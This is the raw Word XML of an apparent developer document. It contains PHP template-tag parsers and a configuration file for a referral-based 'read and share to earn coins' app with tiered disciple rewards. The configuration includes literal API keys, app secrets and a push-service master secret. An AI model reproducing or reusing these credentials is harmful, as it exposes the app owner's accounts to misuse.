          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支持变量赋值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030866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 xml:space="preserve"> {define name="" value="" /}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744F00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5E35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4CCBB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3F33C8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40906D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BD2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Define($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EEA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B45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 . $tag['name'] . '\'';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AD2D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tag['value'], 0, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BE81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1C8DC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tag['value']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AF0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D623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 . $tag['value'] . '\'';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26289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F41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define(' . $name . ', ' . $value . '); ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172D9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4B72D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CF4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320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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F609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p>
    <w:p w14:paraId="3895A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 start="" end="" comparison="" step="" name=""}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6068D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ontent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31752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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F8EF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47102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5219AE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3E3BC0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15429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D6B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For($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A68C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5DF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rt      = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4745B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d        = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CF4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ep       = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E91C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mparison = 'lt';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7800B2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD4DC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and       = rand(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A8D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ag as $key =&gt; $value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C1E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rim($value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1539CB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  = substr($value, 0, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653CE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 == $flag || ':' == $flag) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA9E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this-&gt;autoBuildVar($value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A655D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C26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key) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FF1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start':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792AF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rt = $value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017782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0DE75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ase 'end':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51556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d = $value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55632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7BF1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step':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B9E2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ep = $value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B33C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D085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comparison':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63361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mparison = $value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA00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26C9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name':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6DB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value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9EE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B3F6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5DF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0262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__FOR_START_' . $rand . '__=' . $start . ';$__FOR_END_' . $rand . '__=' . $end . ';';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A895B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for($' . $name . '=$__FOR_START_' . $rand . '__;' . $this-&gt;parseCondition('$' . $name . ' ' . $comparison . ' $__FOR_END_' . $rand . '__') . ';$' . $name . '+=' . $step . '){ ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32866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content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A74F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 ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2365F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1B06FD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3DE6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AF8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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数的</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE65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格式：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{url link="</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模块</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>控制器</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>" vars="</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>" suffix="true</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">false </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否带有后缀</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>" domain="true</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">false </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否携带域名</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>" /}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018BF8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71C01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7064D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68A23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31A61D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D38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Url($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69629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79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isset($tag['link']) ? $tag['link'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EBA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s   = isset($tag['vars']) ? $tag['vars'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC42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ffix = isset($tag['suffix']) ? $tag['suffix'] : 'true';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB3CB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isset($tag['domain']) ? $tag['domain'] : 'false';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F935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lt;?php echo url("' . $url . '","' . $vars . '",' . $suffix . ',' . $domain . ');?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D2CA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AEA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E4F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unction</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>匿名函数，可实现递归</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4973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使用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCF8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unction name="func" vars="$data" call="$list" use="&amp;$a,&amp;$b"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C753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if is_array($data)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE616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each $data as $val}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFC9C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unc($val) /}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C11B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oreach}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DECE1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39D83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data}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCC9B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if}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006DD1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unction}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100DE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ccess public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0125FE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rray $tag </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A9ED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string $content </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770A9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string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9BF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B4C4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agFunction($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E0E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AC2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empty($tag['name']) ? $tag['name'] : 'func';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7761D1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s = !empty($tag['vars']) ? $tag['vars'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBC1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ll = !empty($tag['call']) ? $tag['call'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1188C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  = ['&amp;$' . $name];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AE3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tag['use'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01693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explode(',', $tag['use']) as $val) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA76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 = '&amp;' . ltrim(trim($val), '&amp;');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E41D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D97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02BD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lt;?php $' . $name . '=function(' . $vars . ') use(' . implode(',', $use) . ') {';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3D1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 ?&gt;' . $content . '&lt;?php }; ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DB0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seStr .= $call ? '$' . $name . '(' . $call . '); ?&gt;' : '?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414355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arseStr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3D8B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104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57F5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053E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3D3DAA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10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AFBE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gt; '0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E301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 =&gt; '1',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CC9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0E1B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3DBEDD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Key' =&gt; '4z3hlwrv4ovvt',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4D60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Secret' =&gt; 'BU6RSKLnJVN',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596B6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sonPath' =&gt; 'jsonsource/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083B0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ABAE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50272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                =&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081CF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l'              =&gt;  '1',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2CD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r'              =&gt;  '5',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620A2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fenxiang'</w:t>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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分享到朋友圈不仅可以获得</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;span&gt;20</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/span&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，还可以获得现金，现在每收一个有效徒弟最低可赚</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;span&gt;4</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/span&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>现金！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399CEF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1'</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1',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A64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1_money'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09938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2'</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10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C84F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2_money'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'30',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E283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3'</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20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C9D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3_money'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'50',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FC07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4'</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50',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBBB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4_money'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'200',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D95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5'</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100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E86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oxiang_tudi_5_money'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'500',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6819C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aocha'           =&gt;'10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40422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1'</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10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45307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qiandao_2'</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15',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F208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3'</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20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC38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4'</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25',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECF1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5'</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30',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B023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6'</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35',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E372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_7'</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gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'40'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747053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4302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16409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gt; 'http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47943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d_url' =&gt; 'http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5A2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496A4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title' =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E608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go' =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28868C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gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD71D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gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738FE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hone' =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FD43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q' =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C02C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gt; '1',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318A0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uanjianci' =&gt; 'BTC,ETH',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BABA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pyright' =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A09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ED53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52E2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57851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gt; 'A6939467624361',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276C0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key' =&gt; '50154B45-A563-E16C-6D62-3E563888C324',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756C0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key' =&gt; '388d9d36ad6e4e7d18209111',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6A7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ster_secret' =&gt; '0753bfdfc5aaab3abb6704fa',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB6C2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_time' =&gt; '3',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77417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an' =&gt; '0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2543A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 =&gt; '1',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AA92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AC1D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190A6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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每名徒弟奖励</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元了，马上收徒</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7DC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sg' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>徒弟每天阅读，都能向您进贡金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57618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enxiang_title' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分享标题，后台自行修改内容</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530913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enxiang_content' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分享描述，后台</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>师徒邀请</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>奖励配置</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后台自行修改内容</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
